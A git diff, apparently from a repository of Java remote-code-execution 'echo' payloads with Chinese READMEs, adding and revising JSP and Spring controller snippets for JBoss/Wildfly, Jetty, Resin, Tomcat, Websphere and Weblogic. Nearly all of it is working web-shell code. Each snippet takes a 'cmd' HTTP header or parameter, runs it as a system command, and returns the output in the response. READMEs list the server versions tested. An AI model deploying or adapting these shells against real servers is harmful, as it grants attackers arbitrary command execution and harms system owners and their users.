diff --git a/JBoss(Wildfly)/README.md b/JBoss(Wildfly)/README.md new file mode 100644 index 0000000..fcba90d --- /dev/null +++ b/JBoss(Wildfly)/README.md @@ -0,0 +1,7 @@ +# JBoss(Wildfly) 回显 + +## 效果 +![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/JBoss(Wildfly)/img/JBossEcho.png) + +## 参考 +[https://developer.jboss.org/thread/169877](https://developer.jboss.org/thread/169877) diff --git a/JBoss(Wildfly)/code/JBossEcho.jsp b/JBoss(Wildfly)/code/JBossEcho.jsp new file mode 100644 index 0000000..1498b7e --- /dev/null +++ b/JBoss(Wildfly)/code/JBossEcho.jsp @@ -0,0 +1,18 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + io.undertow.servlet.spec.HttpServletRequestImpl req = (io.undertow.servlet.spec.HttpServletRequestImpl) javax.security.jacc.PolicyContext.getContext("javax.servlet.http.HttpServletRequest"); + String cmd = req.getParameter("cmd"); + if(cmd != null && !cmd.isEmpty()) { + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.io.OutputStream os = req.getExchange().getOutputStream(); + + byte[] bytes = new byte[1024]; + int len = 0; + while ((len = in.read(bytes)) != -1) { + os.write(bytes, 0, len); + } + + os.close(); + in.close(); + } +%> \ No newline at end of file diff --git a/JBoss(Wildfly)/img/JBossEcho.png b/JBoss(Wildfly)/img/JBossEcho.png new file mode 100644 index 0000000..3abf5fe Binary files /dev/null and b/JBoss(Wildfly)/img/JBossEcho.png differ diff --git a/Jetty/code/jetty789Echo.jsp b/Jetty/code/jetty789Echo.jsp index 847e28e..4028bf4 100644 --- a/Jetty/code/jetty789Echo.jsp +++ b/Jetty/code/jetty789Echo.jsp @@ -24,14 +24,17 @@ obj = method.invoke(connection, null); method = obj.getClass().getMethod("getHeader", new Class[]{String.class}); - obj = method.invoke(obj, new Object[]{"cmd"}); + String cmd = (String)method.invoke(obj, new Object[]{"cmd"}); - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class}); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"}); - printWriter.println(res); + method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class}); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"}); + printWriter.println(res); + } + break; }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){ java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null); Object httpChannel = method.invoke(obj, null); @@ -40,16 +43,19 @@ obj = method.invoke(httpChannel, null); method = obj.getClass().getMethod("getHeader", new Class[]{String.class}); - obj = method.invoke(obj, new Object[]{"cmd"}); - - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); - - method = httpChannel.getClass().getMethod("getResponse", null); - obj = method.invoke(httpChannel, null); - - method = obj.getClass().getMethod("getWriter", null); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null); - printWriter.println(res); + String cmd = (String)method.invoke(obj, new Object[]{"cmd"}); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + method = httpChannel.getClass().getMethod("getResponse", null); + obj = method.invoke(httpChannel, null); + + method = obj.getClass().getMethod("getWriter", null); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null); + printWriter.println(res); + } + + break; } } %> \ No newline at end of file diff --git a/Jetty/code/jetty78Echo.jsp b/Jetty/code/jetty78Echo.jsp index 6165920..cda8dbd 100644 --- a/Jetty/code/jetty78Echo.jsp +++ b/Jetty/code/jetty78Echo.jsp @@ -22,13 +22,16 @@ obj = method.invoke(connection); method = obj.getClass().getMethod("getHeader", String.class); - obj = method.invoke(obj, "cmd"); + String cmd = (String)method.invoke(obj, "cmd"); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); + method = connection.getClass().getMethod("getPrintWriter", String.class); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8"); + printWriter.println(res); + } - method = connection.getClass().getMethod("getPrintWriter", String.class); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8"); - printWriter.println(res); + break; } } %> \ No newline at end of file diff --git a/Jetty/code/jetty9Echo.jsp b/Jetty/code/jetty9Echo.jsp index 67a0aff..9b5e807 100644 --- a/Jetty/code/jetty9Echo.jsp +++ b/Jetty/code/jetty9Echo.jsp @@ -24,16 +24,19 @@ obj = method.invoke(httpChannel); method = obj.getClass().getMethod("getHeader", String.class); - obj = method.invoke(obj, "cmd"); - - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); - - method = httpChannel.getClass().getMethod("getResponse"); - obj = method.invoke(httpChannel); - - method = obj.getClass().getMethod("getWriter"); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj); - printWriter.println(res); + String cmd = (String)method.invoke(obj, "cmd"); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + method = httpChannel.getClass().getMethod("getResponse"); + obj = method.invoke(httpChannel); + + method = obj.getClass().getMethod("getWriter"); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj); + printWriter.println(res); + } + + break; } } %> \ No newline at end of file diff --git a/README.md b/README.md index f301609..6dc3acc 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,9 @@ - [x] Windows通用回显 - [x] Spring回显 - [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22) -- [x] Weblogic +- [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0) +- [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5)) +- [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1) - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15) - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908, failed on 8.0.3.v20160908, 7.2.1.v20101111) diff --git a/Resin/code/resinEcho.jsp b/Resin/code/resinEcho.jsp index d9a6b19..da00953 100644 --- a/Resin/code/resinEcho.jsp +++ b/Resin/code/resinEcho.jsp @@ -1,6 +1,6 @@ <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% - Class clazz = Thread.currentThread().getClass(); + Class clazz = Thread.currentThread().getClass(); java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals"); field.setAccessible(true); Object obj = field.get(Thread.currentThread()); @@ -21,14 +21,19 @@ if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){ com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj; String cmd = httpRequest.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); - httpResponse.setHeader("Content-Length", res.length() + ""); - java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null); - method.setAccessible(true); - com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null); - httpResponseStream.write(res.getBytes(), 0, res.length()); - httpResponseStream.close(); + + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); + httpResponse.setHeader("Content-Length", res.length() + ""); + java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null); + method.setAccessible(true); + com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null); + httpResponseStream.write(res.getBytes(), 0, res.length()); + httpResponseStream.close(); + } + + break; } } %> \ No newline at end of file diff --git a/Spring/README.md b/Spring/README.md index 06fd49e..579a2f0 100644 --- a/Spring/README.md +++ b/Spring/README.md @@ -1,4 +1,4 @@ -# Spring回显 +# Spring 回显 ## 依赖 * Spring-web.jar diff --git a/Spring/code/SpringMVCTestController.java b/Spring/code/SpringMVCTestController.java index 7552318..cd936d0 100644 --- a/Spring/code/SpringMVCTestController.java +++ b/Spring/code/SpringMVCTestController.java @@ -19,8 +19,10 @@ public User Test() throws IOException { javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse(); String cmd = httprequest.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - httpresponse.getWriter().println(res); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + httpresponse.getWriter().println(res); + } return new User(); } diff --git a/Spring/code/SpringWebFlowTestController.java b/Spring/code/SpringWebFlowTestController.java index c6d73b9..82f13c6 100644 --- a/Spring/code/SpringWebFlowTestController.java +++ b/Spring/code/SpringWebFlowTestController.java @@ -26,8 +26,10 @@ public String test() throws IOException { javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse(); String cmd = request.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - response.getWriter().println(res); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + response.getWriter().println(res); + } return "test"; } diff --git "a/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" new file mode 100644 index 0000000..35c7ecd --- /dev/null +++ "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" @@ -0,0 +1,56 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + +// 参考: +// 《tomcat不出网回显连续剧第六集》 https://xz.aliyun.com/t/7535 + + boolean flag = false; + + javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer(); + java.lang.reflect.Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor"); + field.setAccessible(true); + Object obj = field.get(mbeanServer); + + field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository"); + field.setAccessible(true); + com.sun.jmx.mbeanserver.Repository repository = (com.sun.jmx.mbeanserver.Repository) field.get(obj); + + java.util.Set objectSet = repository.query(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,*"), null); + for(com.sun.jmx.mbeanserver.NamedObject namedObject : objectSet){ + javax.management.DynamicMBean dynamicMBean = namedObject.getObject(); + field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource"); + field.setAccessible(true); + obj = field.get(dynamicMBean); + + field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"); + field.setAccessible(true); + java.util.ArrayList procssors = (java.util.ArrayList) field.get(obj); + + field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"); + field.setAccessible(true); + for(int i = 0; i < procssors.size(); i++){ + org.apache.coyote.Request req = (org.apache.coyote.Request) field.get(procssors.get(i)); + String cmd = req.getHeader("cmd"); + if(cmd != null && !cmd.isEmpty()){ + String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; + byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes(); + + Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]); + try { + Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk"); + obj = cls.newInstance(); + cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)}); + resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj}); + } catch (NoSuchMethodException var5) { + Class cls = Class.forName("java.nio.ByteBuffer"); + obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result}); + resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj}); + } + + flag = true; + } + + if(flag) break; + } + } +%> diff --git a/Websphere/README.md b/Websphere/README.md new file mode 100644 index 0000000..6cfeb58 --- /dev/null +++ b/Websphere/README.md @@ -0,0 +1,5 @@ +# Websphere 回显 + +## 效果 +![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/Websphere/img/001.png) + diff --git a/Websphere/code/websphereEcho.jsp b/Websphere/code/websphereEcho.jsp new file mode 100644 index 0000000..b507eb7 --- /dev/null +++ b/Websphere/code/websphereEcho.jsp @@ -0,0 +1,28 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + Class clazz = Thread.currentThread().getClass(); + java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals"); + field.setAccessible(true); + Object obj = field.get(Thread.currentThread()); + + Object[] obj_arr = (Object[]) obj; + for(int i = 0; i < obj_arr.length; i++){ + Object o = obj_arr[i]; + if(o == null) continue; + + if(o.getClass().getName().endsWith("WebContainerRequestState")){ + Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]); + Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]); + + String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"}); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]); + printWriter.println(res); + } + + break; + } + } +%> diff --git a/Websphere/img/001.png b/Websphere/img/001.png new file mode 100644 index 0000000..e52c345 Binary files /dev/null and b/Websphere/img/001.png differ diff --git a/weblogic/README.md b/weblogic/README.md index d562358..a2f1097 100644 --- a/weblogic/README.md +++ b/weblogic/README.md @@ -1,4 +1,4 @@ -# Weblogic 反序列化回显 +# Weblogic 回显 ## 说明 代码直接搬运了 ```lufei``` 师傅的代码 diff --git a/weblogic/code/WeblogicEcho.jsp b/weblogic/code/WeblogicEcho.jsp new file mode 100644 index 0000000..aaf3d18 --- /dev/null +++ b/weblogic/code/WeblogicEcho.jsp @@ -0,0 +1,29 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork(); + if(adapter.getClass().getName().endsWith("ServletRequestImpl")){ + String cmd = (String) adapter.getClass().getMethod("getHeader", String.class).invoke(adapter, "cmd"); + + if(cmd != null && !cmd.isEmpty()){ + String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) adapter.getClass().getMethod("getResponse").invoke(adapter); + res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); + res.getServletOutputStream().flush(); + res.getWriter().write(""); + } + }else{ + java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); + field.setAccessible(true); + Object obj = field.get(adapter); + obj = obj.getClass().getMethod("getServletRequest").invoke(obj); + String cmd = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "cmd"); + + if(cmd != null && !cmd.isEmpty()){ + String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getResponse").invoke(obj); + res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); + res.getServletOutputStream().flush(); + res.getWriter().write(""); + } + } +%> diff --git a/weblogic/code/weblogic-10.0.3.jsp b/weblogic/code/weblogic-10.0.3-deprecated.jsp similarity index 100% rename from weblogic/code/weblogic-10.0.3.jsp rename to weblogic/code/weblogic-10.0.3-deprecated.jsp diff --git a/weblogic/code/weblogic-12.1.3.jsp b/weblogic/code/weblogic-12.1.3-deprecated.jsp similarity index 100% rename from weblogic/code/weblogic-12.1.3.jsp rename to weblogic/code/weblogic-12.1.3-deprecated.jsp